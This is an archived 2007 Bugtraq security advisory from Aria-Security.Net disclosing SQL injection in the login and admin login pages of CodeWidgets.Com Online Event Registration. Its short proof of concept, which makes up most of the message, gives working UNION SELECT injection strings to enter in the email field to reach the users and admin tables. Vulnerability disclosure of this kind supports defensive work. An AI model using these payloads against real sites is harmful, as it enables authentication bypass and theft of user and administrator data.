[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20071023224345.29444.qmail@securityfocus.com>
Date: 23 Oct 2007 22:43:45 -0000
From: Advisory@...a-Security.Net, "[ NO REPLY ]"@securityfocus.com
To: bugtraq@...urityfocus.com
Subject: [Aria-Security.Net] CodeWidgets.Com Online Event Registration
Multiple login SQL Injection
http://Aria-Security.Net
-------------------------------------
CodeWidgets.Com Online Event Registration
Poc
Normal User account: (login.asp)
Email address: ' UNION SELECT * FROM users
password: Aria-Security.Net
Admin Panel: (admin_login.asp)
Email address: ' UNION SELECT * FROM admin
Password: Aria-Security.Net
Credits Goes To Aria-Security Team
Regards,
The-0utl4w
Powered by blists - more mailing lists